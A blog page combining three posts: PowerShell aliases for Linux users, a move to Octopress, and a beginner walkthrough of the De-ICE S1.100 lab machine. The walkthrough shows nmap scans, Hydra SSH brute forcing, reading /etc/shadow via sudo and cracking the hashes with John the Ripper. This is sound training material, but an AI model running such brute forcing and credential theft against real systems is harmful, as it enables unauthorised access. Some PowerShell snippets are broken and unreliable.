Running Windows as a main OS can be tough times for many hard core Linux users, especially when you want some command line power. PowerShell at first glance looks alien to some, but under closer inspection it’s not a million miles away from what you can achieve in a Bash shell.

If you’re like me you’ll have a few handy aliases that save a bit of time whilst working in your Linux environment. For example the below aliases save having to type out long commands that you may use quite often:

alias lsa="ls -lsahS"

alias screen="screen -xRR"

alias ..="cd .."
alias ...="cd ../.."
alias ....="cd ../../.."
alias .....="cd ../../../..”

alias upd="sudo apt-get update"
alias upg="sudo apt-get upgrade"
alias ins="sudo apt-get install"
alias rem="sudo apt-get purge"
alias fix="sudo apt-get install -f"

If you find yourself dropping into a Linux virtual machine to use the command line functionality you may be surprised to learn that a lot of the same functionality can be achieved with PowerShell. PowerShell handles everything as an object which makes piping between commands very powerful. For example, if I want to return the full path for every file in the current directory I could do the following:

Get-ChildItem | Select-Object fullname

Each file returned is piped to the select command to get the fullname attribute of the file object.

It’s worth learning about the PowerShell equivalents of some of the commands you might run in a Linux shell. Below I’ve put some of the more familiar Linux command line binaries and their PowerShell counterparts.

Listing running processes





Stopping a process


kill calc.exe


get-process calc.exe | StopProcess

Displaying a list of 1 to 10


seq 1 10



Print the first 10 lines of a file


head -n10 file.txt


gc file.txt | select -first 10

Print the last 10 lines of a file


tail -n10 file.txt


gc file.txt | select -last 10 

Count the lines in a file


wc -l file.txt


gc file.txt | Measure-Object -Line 

Print lines that contain the word “example”


grep example file.txt


Select-Text example file.txt

Split file using “:” as a delimiter and print the second item


awk -F ":" '{print $1}' file.txt


gc file.txt | %{ $_.Split(':')[1]; }

Replace the word “example” with “elpmaxe” in file.txt


cat file.txt | sed ’s/example/elpmaxe/‘


gc test.txt | Select-String “example" | %{ $_ -replace ‘example', 'elpmaxe' }

There’s actually a lot of built in aliases in PowerShell already so if you find yourself loathing some long command string you might be pleased to know that their is probably already a shortcut for it already. You can find out what these are with the following command:


As you can see there are a few items in the list that would be familiar to you if you are from a Linux background. Aliases such as ls, cat and rm are just a few examples of aliases that you wont need to re-learn (or set up) for PowerShell. Remember that command at the start where I grabbed the full path for each file in the directory? That could have been simplified using these built in aliases.

ls | select fullname

That’s not so much of a pain to type is it?

Setting up your PowerShell profile

For practice I’ll go through setting up the profile (mostly) in PowerShell. The PowerShell environment tries to load your profile information from the following file (may differ with different Windows operating systems):


This file location is stored in the PowerShell environment variable $PROFILE as seen below:


Let’s use this variable to create this file in this location:

New-Item -type file -force $PROFILE

Hooray, we’ve just made a PowerShell profile file.

Adding aliases to our PowerShell profile file

Let’s open up that file from within PowerShell because we’re gurus now:

notepad $PROFILE

In a .bashrc/.bash_aliases file you can define functions that can be run as well as aliases, unfortunately this isn’t possible with PowerShell. You must first define the function then use the New-Alias command to tie the function name to an alias that we can type into the prompt.

With the open file let’s add some aliases:

How about a quick alias to run ipconfig:

New-Alias ipconfig -value ip

If you want to do ipconfig /all the following would be required as you are supplying the name of the command and an argument:

function ipconfig_all_function() {
    ipconfig /all
New-Alias -name ipa -value ipconfig_all_function

Change to your $HOME directory:

cd_home_function() {
    cd $HOME
New-Alias -name home -value cd_home_function

Maybe a shortcut to open notepad if you’re in a console window:

New-Alias -name n -value notepad

Being lazy is cool remember:

function exit_function() {
New-Alias -name x -value exit_function

Once you have some aliases in your profile file just save it and open a new PowerShell instance and test them out! You’ll get an error if something is wrong in the file so you’ll be able to correct yourself.

The aliases above are pretty simple. Here is one I’ve made that sets up a git repository with some local configuration settings. This can be useful if you have multiple git servers using different user names and e-mails assigned to them.

function gitinb_function() {
    git init
    git config --local NullModeBitbucket
    git config --local
New-Alias -name gitinb -value gitin_function

function giting_function() {
    git init
    git config --local NullModeGithub
    git config --local
New-Alias -name giting -value gitin_function

More customization

Here are a couple of places you can go to read about aliases and profile customization that you may wish to incorporate into your own profile file:

Bonus information!

There’s some special locations you can get to within PowerShell. I thought I’d include them here while I remember as maybe someone will find them useful.

View the windows environment variables:

cd env:

View the Windows HIVE files:

cd HKLM:

If you want to find out about a particular item in one of of these locations you can do the following (remembering that past the tabbing through the items is possible):

echo $Env:OS


Thanks to @lllamaboy for giving me the first steps on setting up a python $PROFILE and letting me in on the whole special location thing.

So, a friend of mine was talking about this thing called Octopress and how he was moving his blogspot content across to it. I toiled for a while thinking that it wasn’t something I needed to do right now, but in the end I gave in and spent an evening moving my own blog across (I only had 2 posts before this so I assumed it would be quick – and I was right). There are plenty of blogs describing the process of setting up an Octopress site using GitHub pages, so rather than regurgitate others material I’ll talk about the bits that I got stuck with. But first…

Why did I move?

It’s not hard to notice that I’ve only got two other posts on this blog. There’s a couple reasons for that. The main reason is I don’t like to repeat content that’s already out on the net. I’ve had a few things to talk about previously but after having a look about it’s already been done before, so why copy what’s out there? Secondly, the sort of posts that I would like to write (like my De-Ice guide) would be in depth. Whilst I do enjoy blogging, using blogspot was a pain to use. Making everything look pretty using the formatting in blogspot was tedious and slow making me reluctant/too lazy to write big blog posts.

Not so long ago I had been updating my files in my GitHub repositories using a tool called MarkdownPad2. In the git fashion, I was writing the markdown locally, seeing the output of the markdown in MarkdownPad before pushing. After finding out how Octopress works the way I could push blog posts out was more appealing: I could create pages offline, work on them offline and see the preview of the generated output offline all before pushing it GitHub and using a very glorified notepad-ish tool. All along with simple and to the point formatting. Hazzah.

What is Octopress anyway?

For those who don’t know what Octopress is, here’s a small run down. Octopress is a Ruby on Rails application that is essentially a framework for Jekyll: a static website generator. This generated content can then be pushed up to a repository on GitHub, and then you can use GitHub pages to host it. Visiting the Octopress site will give you some more information about Octopress.

So what is markdown?

Markdown is language created for the sole purpose allowing people “to write using an easy-to-read, easy-to-write plain text format, and optionally convert it to structurally valid XHTML (or HTML)”. The syntax is so basic that makes knocking up a simple page (such as readme files for GitHub repositories) trivial.

Windows installation

The main bulk of my installation came from following the two guides below. This includes setting up: titles, a custom theme, adding posts and adding pages:


Since I had ruby mostly installed on my system all I needed was to download and install the DevKit which is required for Octopress. The download for DevKit can be found on Ruby Installer website (make sure you get the correct version for your Ruby install).

Bundle exec

On my shell in windows I was getting an error because the wrong version of rake was installed. Anyone who knows what they’re going with Ruby knows that they can run the required version by using bundle exec (I had to look this up because I don’t normally work with Ruby):

> rake new_post["My move to Octopress"]
You have already activated rake 10.1.0, but your Gemfile requires rake
Using bundle exec may solve this.

Simply prepend your commands within the application with “bundle exec”, like so:

> bundle exec rake new_post["My move to Octopress"]

Adding a twitter recent tweet box

After being disappointed that a twitter box didn’t appear after filling in my details in the configuration file I was pointed to Jmac’s post on how to put twitter back into Octopress. The guide was pretty easy to follow, although I removed the following line from the twitter.html page as it wasn’t required for my theme:


Custom favicon in Octopress

I wanted to use my old blog’s favicon on my Octopress site. Presumably it would be a copy and paste win, however Octopress likes to have the favicon as a png file (yes you could edit some html to include the ico, but the following was faster for my lazy brain somehow). The main solution was found at the end of this post. Firstly I went to my old site (before the CNAME part below if you skipped ahead) and downloaded the favicon: I then needed to convert my .ico to a .png file. Since I couldn’t be bothered to use some fancy image library for converting the .ico which had been mentioned in a few guides, I simply went to for the conversion. With this new favicon.png in hand, I added it to my sources/ folder and ran bundle exec rake generate which added the favicon to my generated code.

Pointing a custom domain to your GitHub Pages site

Most people want to have a custom domain pointing to their blog. The steps for this are really simple, GangMax and GitHub are both good guides on how to do this. However, remember how I said I was on windows? On my command line (PowerShell by default) I ran the following:

> echo > sources/CNAME    

That should be okay? Right? Well no. When I deployed my site with the new CNAME file I got an e-mail from GitHub:

The page build completed successfully, but returned the following warning:

Bad CNAME format: ÿþb l o g . n u l l m o d e . c o m

Weird right? Well, it turns out that when piping into a file with PowerShell it uses the encoding UCS 2 Little Endian (checking with Notepad++ on the encoding tab). To fix this I done the following using Notepad++: open said file, clicking Encoding, then selecting Convert to UTF-8 without BOM and saving. It turns out that using the old fashioned Command Prompt for piping the CNAME into the CNAME file uses the correct encoding. Committing and redeploying after the changing the encoding fixed this error.

List of links

About De-ICE S1.100 (Level 1)

This machine is very good for those looking to get their teeth into learning some simple penetration testing techniques. It allows newcomers to have a play with some common tools that are used in many penetration tests. In this guide I will to go into some detail to help beginners understand these tools. My aim is to inform you of why a chosen tool was been picked for the task and how to use the tool at a basic level.

Things to Remember

Throughout the guide I will reference several tools. If you wish to find out more about the tool and the options is has available, the following command should aid you. Use it whenever you get stuck with a application.


man <application>
man netdiscover
man nmap 

If you still find yourself stuck or have questions then crack out Google. Research, take notes, and learn. Do not take short cuts by not reading sections or dismissing stuff you don’t understand, you will fail in the long run. People will also be less likely to help you if you’ve not given a challenge your best shot already.


Download information and network setup can be found on Vulnhub. I typically recommend running Kali or Backtrack in one virtual machine, then the De-Ice in another. In this guide I use Kali Linux. If you get stuck on setting up your virtual machines check out Vulnhub’s comprehensive guide. For this particular machine you will be required to have your attacking box to be in the network range.


Throughout this blog post I’m going to use this word a lot. In computer security enumeration is the the process of finding out as much information about a target as possible. Sorting through the information to prioritise possible leads which may help with a successful breach. This gathering of information is the key to a successful attack and I cannot stress enough how important this is.

Target Discovery

In our case we can’t target the machine yet because we don’t know the machine’s IP address. Therefore finding the IP is the first task. If the setup of the virtual machine went according to plan you should be able to run the netdiscover command to scan for active IP addresses on the same subnet.

root@kali ~$ netdiscover
Currently scanning:   |   Screen View: Unique Hosts           

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180               
   IP            At MAC Address      Count  Len   MAC Vendor                   
 -----------------------------------------------------------------------------     00:50:56:c0:00:01    01    060   VMWare, Inc.            00:0c:29:49:2d:4c    01    060   VMware, Inc.            00:50:56:f5:1b:d6    01    060   VMWare, Inc.                 

The command netdiscover sends out ARP (..) requests to locate active machines on a network subnet. ARP is used to aid communication in IP based networked. ARP requests are sent to confirm a nodes MAC address so communication between two machines can occur. This tool is sending out ARP requests for each IP address in each subnet range that is scanned. If a node responds with a MAC address it means that a machine is alive on the requested IP address. This tool also works through switched networks, and when the above command is run you will see it go through multiple subnets to check for active machines.

As you can see we receive a response from three machines. What we now want to do is find out which is our target box. In this case the machine has been hard coded with an IP address (, but it’s good practice to scan all the machines found (which is what you’d do in a real life situation!).

Service Enumeration

The first and arguably the most important part of any penetration test is scanning the machine to find which services are running on it. Some of the questions you will need to answer are:

  • What services are running on the target?
  • What version are they running?
  • Are there any plugins attached to the services?
  • What versions are the plugins?
  • Are you able to identify any service misconfiguration?
  • Is there a web server?
  • Is it off the shelf? (wordpress)
  • Version?
  • Plugins and Versions?
  • Misconfigured?

Enumeration is the key! Don’t get ahead of yourself by attacking the box the moment you find something that could be exploited. This is the mistake a lot of new comers make and they end up going back to the start.

We are going to use nmap to scan each address. The nmap program is one of the bread and butter applications you need to know about. It has a wide array of functions and options which can be used in different circumstances and situations.

To start with, let’s scan the found addresses. We can use a “,” to add multiple IP addresses into one scan like so:

root@kali ~$ nmap,100,254                                     

Starting Nmap 6.25 ( ) at 2013-07-28 20:56 EDT
Nmap scan report for
Host is up (0.00030s latency).
Not shown: 999 filtered ports
80/tcp open  http
MAC Address: 00:50:56:C0:00:01 (VMware)

Nmap scan report for
Host is up (0.00017s latency).
Not shown: 992 filtered ports
20/tcp  closed ftp-data
21/tcp  open   ftp
22/tcp  open   ssh
25/tcp  open   smtp
80/tcp  open   http
110/tcp open   pop3
143/tcp open   imap
443/tcp closed https
MAC Address: 00:0C:29:49:2D:4C (VMware)

Nmap scan report for
Host is up (0.000058s latency).
All 1000 scanned ports on are filtered
MAC Address: 00:50:56:F5:1B:D6 (VMware)

Nmap done: 3 IP addresses (3 hosts up) scanned in 21.75 seconds

As you can see from scanning, and we have found what looks like to be our target machine. The default nmap scan checks1000 ports out of the 65535 total, it also shows what the default application that runs on that port is. To get more specific we can run a more comprehensive nmap command for

root@kali ~$ nmap -sS -Pn -sV -O -p 20,21,22,25,80,110,143,443                   

Starting Nmap 6.25 ( ) at 2013-07-28 21:37 EDT
Nmap scan report for
Host is up (0.00026s latency).
20/tcp  closed ftp-data
21/tcp  open   ftp      vsftpd (broken: could not bind listening IPv4 socket)
22/tcp  open   ssh      OpenSSH 4.3 (protocol 1.99)
25/tcp  open   smtp?
80/tcp  open   http     Apache httpd 2.0.55 ((Unix) PHP/5.1.2)
110/tcp open   pop3     Openwall popa3d
143/tcp open   imap     UW imapd 2004.357
443/tcp closed https
MAC Address: 00:0C:29:49:2D:4C (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.13 - 2.6.32
Network Distance: 1 hop
Service Info: OS: Unix

OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 183.57 seconds

Let’s breakdown the options used:

  • -sS This is the default scan method for nmap. It’s called a SYN scan. When a machine wishes to communicate with another machine using TCP they must complete the TCP handshake. Nmap sends a SYN TCP packet to the target address, if the target responds with the SYN ACK packet, the port is determined as open. Nmap will not complete the handshake by sending the ACK packet back to the target, so it’s moderately stealthy.
  • -Pn This wasn’t needed in this instance but I generally include it with single scan. This option skips nmap’s host discovery. When performing a scan across multiple IPs map will split the targets up according how “active” they are deemed to be from an initial response. Disabling this option omits the initial scan and proceeds to run all options against the given IP address range.
  • -sV This option probes open ports for more information to help identify the service and the version.
  • -O Operating System Detection. In this case we know that that the target is a Linux based OS already. However it doesn’t hurt to run with this option just for practice. This mode sends multiple TCP and UDP packets to the target. These results are cross referenced with a database of collected signatures to help identify the operating system of the machine. Be warned, these results can be misleading at times.
  • -p It is often prudent to do an initial scan across a range of IP addresses to pick out the running ports (like we did in our first nmap scan) then target the found open ports in another more intrusive scan. For this command the ports are listed afterwards separated by commas.

We now have a list of ports open, and an almost complete list of services and version numbers. What might be confusing here is that some ports are listed as closed. Wait, surely ports wouldn’t be listed if they are closed? Well actually what nmap is saying is that the port itself is open, but there is no application listening on the port to communicate with.

Before we compile our list so far I wanted to cover off something else quickly that can often reveal more information about a target. Let’s scan again with the-A option:

root@kali ~$ nmap -sS -Pn -sV -O -A -p 20,21,22,25,80,110,143,443                

Starting Nmap 6.25 ( ) at 2013-07-28 21:42 EDT
Nmap scan report for
Host is up (0.00021s latency).
20/tcp  closed ftp-data
21/tcp  open   ftp      vsftpd (broken: could not bind listening IPv4 socket)
22/tcp  open   ssh      OpenSSH 4.3 (protocol 1.99)
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
|_sshv1: Server supports SSHv1
25/tcp  open   smtp?
|_smtp-commands: Couldn't establish connection on port 25
80/tcp  open   http     Apache httpd 2.0.55 ((Unix) PHP/5.1.2)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title (text/html).
110/tcp open   pop3     Openwall popa3d
143/tcp open   imap     UW imapd 2004.357
| imap-capabilities: 
|_  ERROR: Failed to connect to server
443/tcp closed https
MAC Address: 00:0C:29:49:2D:4C (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.13 - 2.6.32
Network Distance: 1 hop
Service Info: OS: Unix

1   0.21 ms

OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 193.72 seconds

As you can see the -A option does some additional enumeration on the ports and also gives us a traceroute to the target. In fact, -A enables a lot of things. -A enables OS detection (-O), version detection (-sV), script scanning (-sC) and traceroute (—traceroute). Traceroute simply shows the path that is taken to the target server. Script scanning makes use of nmaps scripting engine to probe ports for more information. For example, in the above scan result we can see that the title of the web page on port 80 has been returned to us, it also helps us see that there could be a problem with the mail server on port 25, FTP server on port 21 and the IMAP service on port 143. Using scripts can be useful like this, especially when you are targeting a single machine or a handful. Using scripts on a large scan can increase the scan time and amount of information to sort through.

Running services:

  • Port 21 FTP vstfpd Version ?
  • Port 22 SSH OpenSSH Version 4.3
  • Port 25 SMTP Service? Version ?
  • Port 80 HTTP Apache Version 2.0.55 (Also running PHP version 5.1.2)
  • Port 110 POP3 Openwall popa3d Version ?
  • Port 143 IMAP UW Imapd 2004.357

So it looks like we are missing some versions numbers. Is that important? It sure is as one of these services might be vulnerable. However, without knowing what versions are running we would be firing random exploits at them which is time consuming and often unreliable.

Banner Grabbing and Finger Printing

I am adding a small section here to cover off these two terms as they should be learnt by the novice penetration tester. When doing a comprehensive scan with nmap (particular with the -sV option) nmap will probe open ports to build a finger print of the service. This finger print is then compared a ever growing database of fingerprints in order to try and match the port up to a service and running version. This act of port probing to retrieve a service name and version is finger printing.

Banner grabbing is essentially part of the finger printing process. It can be done manually and it’s worth learning how to do this in some cases. Often, when connecting to a service, a message will be transmitted displaying the service name and possibly version number. This connecting and viewing is used by nmap to help determine the fingerprint of a service. Of course this will only be easily done by a user when connecting to a port running a text based protocol.

As an example we are going to use the program netcat to banner grab the HTTP port. Netcat is known as the Swiss army knife for TCP/UDP connection. It is a tool that is able to read and write to network connections using the TCP or UDP protocol. Learning the complete uses of this tool is out of the scope of this article, but I do suggest you do some research on the tool if it’s new to you. More can be read about netcat here and here.

Below shows one possibility of banner grabbing the target machines web port.

root@kali ~$ nc -nvv 80 
(UNKNOWN) [] 80 (http) open

HTTP/1.1 400 Bad Request
Date: Mon, 12 Aug 2013 22:43:50
Server: Apache/2.0.55 (Unix) PHP/5.1.2
Connection: close
Content-Type: text/html; charset=iso-8859-1

Let’s break the process down:

nc -nvv 80

Using netcat, connect to on port 80 The option n states that only IP addressing will be used, no DNS The option vv makes netcat provide extra verbosity

(UNKNOWN) [] 80 (http) open

Once the connection has been established the above message will be shown


HEAD is the HTTP command which requests only the pages header, not the full body / indicates the main page of the site, or the root location of a site HTTP/1.1 defines the HTTP version to make the request with There must be two carriage returns to submit a command in a HTTP request (press ENTER/RETURN twice) The returned response shows a web server version (Apache/2.0.55), the type of system that it has been compiled for (Unix) and even the PHP version that is running on the machine (PHP/5.1.2). It’s worth noting at this point that any competent system administrator could alter any banners running by services to mask their true versions or even service types.

Other HTTP header fields are returned such as Date and Content-Type. Learning about HTTP header fields is a must. I recommend doing some quick googling and reviewing the different types and what they do. Headers of interest are: User-Agent, Content-Type, Cookie, Referrer.

Website Enumeration

Enumerating web applications is as MASSIVE area. I recommend reading the Web Application Hackers Handbook 2nd Edition for an in depth look at web applications and how to tackle them. Fortunately we can find some very useful on the target machine’s website without having to look far. The page contains some information about the vulnerable machine. At the bottom of the page there is a link to Game Related Pages. This page contains some information about the fake company.

Using the information provided you can compile a list of e-mail addresses:

You can also compile a list of possible user names (not forgetting some default ones):


Gathering such information is essential when profiling an organisation. With a large user name list, it’s possible to do large scale login attempts where for each user, a login attempt is tried once or twice with two different passwords. These passwords are used for each account tested. In very large organisations it is likely that a popular password will be used by at least one user.

Attacking the Box

Now we have armed ourselves with information about the machine let’s run through what we know and attempt to find possible ways into the system.

Searching for exploits can be done in many ways. In this case using Kali gives a newcomer a couple of options: the searchsploit command and Metasploit. The searchsploit command searches through the exploit-db database that is stored locally on Kali. Searching for exploits on Metasploit can be achieved by first running the program with msfconsole then running the search command. As well as using these commands the Internet is also a valuable place to check for exploits that are not in exploitdb or do not have metasploit modules written for them. Remember to be thorough when searching for exploits. As this isn’t a perfect world, and there is no naming convention, some exploits listed will effect previous versions and may not appear in your initial search results. It may be worth double checking on various vulnerability listing websites to check if the version of the found service is vulnerable. CVE Details is a nice site that is generally good at checking for vulnerabilities.

Searchsploit example:

root@kali ~$ searchsploit openssh 4.3                                                                                                      
Description                                                                 Path
--------------------------------------------------------------------------- -------------------------
OpenSSH <= 4.3 p1 (Duplicated Block) Remote Denial of Service Exploit       /multiple/dos/ 

Metasploit example:

root@kali ~$ msfconsole -q                                                                                                                 
msf > search openssh

Matching Modules

   Name                                        Disclosure Date  Rank       Description
   ----                                        ---------------  ----       -----------
   exploit/windows/local/trusted_service_path  2001-10-25       excellent  Windows Service Trusted Path Privilege Escalation
   post/multi/gather/ssh_creds                                  normal     Multi Gather OpenSSH PKI Credentials Collection

Port 21 FTP – vstfpd – Version ? From the nmap scan it seems that the service is failing to run correctly so it will unlikely be exploitable Port 22 SSH – OpenSSH – Version 4.3 Only denial of service exploits found Port 25 SMTP – Service? – Version ? Port doesn’t seem to interect with manual commands reference. You can confirm this later with banner grabbing and finger printing techniques Port 80 HTTP – Apache – Version 2.0.55 – PHP version 5.1.2 No suitable exploits found Port 110 POP3 – Openwall popa3d – Version ? Unable to finger print server for exact version Port 143 IMAP – UW Imapd 2004.357 Unable to finger print server for exact version So we couldn’t make much progress in exploiting the servers for remote access. We can however revert to the information we pulled off the website. Using a brute forcing program we can enumerate some of the active services on the machine and see if we can gain access. Hydra is a great program for this sort of task. It is able to brute force a wide variety of common protocols quickly and has a threading option to increase speed.

root@kali ~$ hydra -L users.txt -P users.txt ssh
Hydra ( starting at 2013-08-12 20:22:25
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
[DATA] 16 tasks, 1 server, 1369 login tries (l:37/p:37), ~85 tries per task
[DATA] attacking service ssh on port 22
[STATUS] 110.00 tries/min, 110 tries in 00:01h, 1259 todo in 00:12h, 6 active
[STATUS] 87.67 tries/min, 263 tries in 00:03h, 1106 todo in 00:13h, 6 active
[STATUS] 84.86 tries/min, 594 tries in 00:07h, 775 todo in 00:10h, 6 active
  [22][ssh] host:   login: bbanter   password: bbanter
[STATUS] 86.67 tries/min, 1040 tries in 00:12h, 329 todo in 00:04h, 6 active

After a while you will see that the scan picked up an account using their name as a password. Before we rush ahead, let’s quickly break down the hydra command:

  • -L users.txt – User names to test
  • -P users.txt – Passwords to test, in this case we are checking to see if users have used theirs (or anyone else’s) user names as passwords
  • – The target IP address
  • ssh – The target protocol

Now we are armed with a user name and password that we can use to SSH into the target machine. When prompted for a password, enter bbanter .

root@kali ~$ ssh bbanter@

So we’re in the machine, what now? Well this is where more enumeration is required. I will explain some of the important commands to gather information about the target. The goal here is to profile the machine from the inside and prioritise where it might be good to start targeting. My favourite reference for Linux privilege escalation is by g0tmi1k. Please be aware that these commands may not work for every distribution of Linux. My suggestion here is to run the commands and see what you get. For some more work and self learning try running a few more from the guide I linked above. This process can be pain stacking but it is normal. Power through!

To start with it’s good to see what kernel version is running. This could lead us onto a privilege escalation exploit depending on the version returned:

bbanter@slax:~$ uname -a 

It’s good to list what processes are running as it helps select possible entry points in the system.

bbanter@slax:~$ ps aux

Processes running as root are good to identify as comprising one of these may give you root access over the machine:

bbanter@slax:~$ ps aux | grep

Finding out what ports are open and what programs are listening on them can assist in finding a service to exploit. However identifying the service listening often requires root access. It’s worth a look though:

bbanter@slax:~$ netstat -antup

Finding out what other users are on the system may assist in getting in again, but with elevated privileges:

bbanter@slax:~$ cat /etc/passwd

Finding out about the user groups on the system can also be useful for identifying users with sudo access.

bbanter@slax:~$ cat /etc/group

If you have access, running the following command will output the shadow file of the system, this is a user list with their respective password hashes. This often requires root to run:

bbanter@slax:~$ cat /etc/shadow

Generally speaking this user is pretty well locked down. The kernel version has some vulnerabilities but nothing that will give us access to root. The useful output is from the following commands:

bbanter@slax:~$ cat /etc/passwd
rpc:x:32:32:RPC portmap user:/:/bin/false
bbanter@slax:/home/aadams$ cat /etc/group 

So from these commands we can determine the following: bbanter and ccoffee are part of the users group aadams is part of the wheel group Users seems like a pretty standard group, but what about wheel? The wheel group historically gives users access to to restricted commands. This group in modern UNIX systems (such as Linux) gives users access to the su and sudo commands in order to run commands as the root user. This means out of the users we have the potential of getting into, aadams is more favourable.

We can use hydra again with a few extra options. The main difference here is that we will be using a more comprehensive word list that covers a lot of common passwords.

root@kali ~$ hydra -l aadams -P /usr/share/wordlists/rockyou.txt -e nsr -u -t 128 ssh
Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra ( starting at 2013-08-13 23:55:47
[DATA] 128 tasks, 1 server, 14344401 login tries (l:1/p:14344401), ~112065 tries per task
[DATA] attacking service ssh on port 22
[STATUS] 438.00 tries/min, 438 tries in 00:01h, 14343963 todo in 545:49h, 128 active
[STATUS] 386.00 tries/min, 1158 tries in 00:03h, 14343243 todo in 619:19h, 128 active
[STATUS] 354.00 tries/min, 2478 tries in 00:07h, 14341923 todo in 675:14h, 128 active
[STATUS] 349.27 tries/min, 5239 tries in 00:15h, 14339162 todo in 684:16h, 128 active
[STATUS] 339.68 tries/min, 10530 tries in 00:31h, 14333871 todo in 703:19h, 128 active
[STATUS] 338.70 tries/min, 15919 tries in 00:47h, 14328482 todo in 705:05h, 128 active
[STATUS] 338.40 tries/min, 21319 tries in 01:03h, 14323082 todo in 705:27h, 128 active
[STATUS] 338.97 tries/min, 26779 tries in 01:19h, 14317622 todo in 703:59h, 128 active
[STATUS] 338.73 tries/min, 32179 tries in 01:35h, 14312222 todo in 704:14h, 128 active
[22][ssh] host:   login: aadams   password: nostradamus

This hydra command is a bit more complex to look at but it’s pretty straight forward:

  • -l aadams Where aadams is the user we’re testing
  • -P /usr/share/wordlists/rockyou.txt This is a really good word list full of common base words and common passwords. It is shipped with Kali by default.
  • -u This option makes hydra check each password for each user, rather than checking every password for each user. It’s more effective than doing one user at a time.
  • -t 128 This is how many threads you want hydra to create. Increasing this value can give you some more speed when brute forcing as you can run multiple attacks in parallel.
  • -n esr This parameter enables a couple of options:
    • n test for null password
    • s test password the same as the user name
    • r reversed login as password
  • – The target IP address
  • ssh – The target protocol

We can now login to aadams with the password nostradamus.

root@kali ~$ ssh aadams@

Again we need to enumerate this user and see what we can find out. Try running the commands from before and check the outputs.

The command that should have shown something interesting should have been:

aadams@slax:~$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.

User aadams may run the following commands on this host:
    (root) NOEXEC: /bin/ls
    (root) NOEXEC: /usr/bin/cat
    (root) NOEXEC: /usr/bin/more
    (root) NOEXEC: !/usr/bin/su *root*

So what does this tell us? It means that aadams has sudo access on the machine, meaning running commands as root. Remember before when we tried to view the shadow file and we had a denied message? Well let’s try that again with sudo:

aadams@slax:~$ sudo cat /etc/shadow  

Great! We now have hashes of the users on the system. Our main target is to gain root access on the machine, so to do this we need to find out what the root password is.

Password Cracking So now we have the hashes for the users on the system, we can use a widely used program called John the Ripper to try and crack them.

Before we start you might be thinking what’s a hash? A hash is a one way form of encryption. You take an input value, push it through a hashing algorithm and out comes a value that should be irreversible. The way password hashes are cracked is by taking possible passwords, pushing them through the required algorithm, and see if the hash generated matches the hash you are trying to crack.

Firstly let’s prepare by making a file containing the hashes we wish to crack. To do this we can use an inline technique that can also be used to transfer files easily from your machine into your target shell.

root@kali ~$ cat > hashes.txtroot:$1$TOi0HE5n$j3obHaAlUdMbHQnJ4Y5Dq0:13553:0:::::aadams:$1$6cP/ya8m$2CNF8mE.ONyQipxlwjp8P1:13550:0:99999:7:::

This form of cat command is creating a new file called hashes.txt. The input of the file comes afterwards where you simply type in the rest of the contents. The ^D is not typed, but represents the pressing CTRL+D. This closes the file that has been open for writing.

Now that our hashes are in a file locally let’s run john to try and crack them. You might be thinking “Hey! We know two of these already?” We are going to leave them in there for some practice!

The first command we are going to use john’s single mode. This mode loads the rules from the Single rule set in johns configuration file. You can look at these if you want to, but understanding them is out of the scope of this particular article. If you want to check it out you can find the file at /etc/john/john.conf. Simply put, this mode attempts to create passwords based on simple and common rules to guess hashed passwords.

It’s worth mentioning that john is able to interpret shadow files in their raw format. Hash type detection and the use of user names in the system are done dynamically by john. Other password cracking tools are not so friendly so it’s worth being aware that you may need to extract each hash from shadow files and other hash dumps when using other tools.

root@kali ~$ john -single -pot:deice.pot hashes.txt                                                                             
Loaded 4 password hashes with 4 different salts (FreeBSD MD5 [128/128 SSE2 intrinsics 12x])
bbanter          (bbanter)
guesses: 1  time: 0:00:00:00 DONE (Thu Aug 15 11:38:46 2013)  c/s: 24122  trying: root1907 - root1900
Use the "--show" option to display all of the cracked passwords reliably

As you can see john quickly cracked bbanter’s password as it was the same as their user name. Here’s a quick breakdown of the command:

  • -single – enable simple rule set for guessing passwords
  • -pot:deice-pot – A pot file is the jargon used to describe a file containing cracked passwords. The contents is usually stored as hash:password. This file will hold our cracked passwords for this exercise
  • hashes.txt – the file of un-cracked passwords we made earlier

The -single option is only so good. It will not be able to generate meaningful passwords that some users will use. This is where we will use the rockyou.txt word list once again to try and crack the remaining hashes.

root@kali ~$ john -wordlist:/usr/share/wordlists/rockyou.txt -pot:deice.pot hashes.txt                                          
Loaded 4 password hashes with 4 different salts (FreeBSD MD5 [128/128 SSE2 intrinsics 12x])
Remaining 3 password hashes with 3 different salts
nostradamus      (aadams)
tarot            (root)
hierophant       (ccoffee)
guesses: 3  time: 0:00:01:09 DONE (Thu Aug 15 11:55:59 2013)  c/s: 29217  trying: hieuloan - hieper
Use the "--show" option to display all of the cracked passwords reliably

The -wordlist:/usr/share/wordlists/rockyou.txt is the only parameter different here (swapped out for -single). It simply points to where the word list to be used is located and enables the word list attack method.

So we now have passwords for all the users on the system! Is that it? Well no! Having root access is great, but it doesn’t mean anything to a company that you might be testing. They will want to be told something a bit less technical like: “I was able to compromise your server and gain access to confidential files.”. So, let’s try and do that!

Hunting for Treasure

Let's try and log into the root account over SSH. SSH is commonly configured so that root can not be logged into remotely. But let's confirm that.
root@kali ~$ ssh root@                                                                                                        
root@'s password: 
Permission denied, please try again.
root@'s password: 
Permission denied, please try again.
root@'s password: 
Permission denied (publickey,password,keyboard-interactive).

As we can see it doesn’t seem to want to let us in that way, but it doesn’t matter, we can use the switch user command (su) on aadams to get to root:

root@kali ~$ ssh aadams@                                                                                               255 ↵  
aadams@'s password: 
Linux 2.6.16.
aadams@slax:~$ su root
Password: *****

So we are now running as root and have the run of the entire system. So let’s hunt around for any files that might look interesting.

A good place to start is in the user’s (and root’s) home directories. It is a common place for storing files and the most likely place to find something interesting. Let’s run the following commands:

